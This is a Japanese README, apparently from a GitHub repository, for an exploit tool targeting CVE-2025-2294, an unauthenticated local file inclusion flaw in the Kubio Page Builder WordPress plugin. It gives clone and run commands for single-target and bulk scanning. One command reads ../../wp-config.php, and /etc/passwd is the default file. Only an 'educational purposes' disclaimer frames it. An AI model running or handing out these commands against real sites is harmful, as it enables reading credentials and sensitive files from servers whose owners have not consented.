
Kubio Page Builder WordPressプラグイン(CVE-2025-2294)用の未認証ローカルファイルインクルード(LFI)エクスプロイト。単一ターゲット、バルクスキャン、バージョン検出、カスタムファイルパス読み取りをサポートします。
Kubio Page Builder WordPress プラグイン (バージョン ≤ 2.5.1) 用のローカルファイルインクルージョン (LFI) エクスプロイト。
このツールは、Kubio Page Builder プラグイン (CVE-2025-2294) の認証不要の LFI 脆弱性を悪用し、攻撃者が脆弱な WordPress インストール上の機密ファイルを読み取ることを可能にします。
-u)-l)-o)git clone https://github.com/mrrivaldo/CVE-2025-2294.git
python3 cve-2025-2294.py -u https://vulnerable-site.com
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php
python3 cve-2025-2294.py -l targets.txt -o results.txt
python3 cve-2025-2294.py --help
| オプション | 説明 |
|---|---|
-u, --url | 単一ターゲットのURL |
-l, --list | ターゲット一覧を含むファイル |
-f, --file | 読み取るファイル (デフォルト: /etc/passwd) |
-o, --output | 脆弱なターゲットをファイルに保存 |
targets.txt:
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com
このツールは教育目的のみのものです。開発者は誤使用について一切の責任を負いません。システムをテストする前に必ず適切な許可を得てください。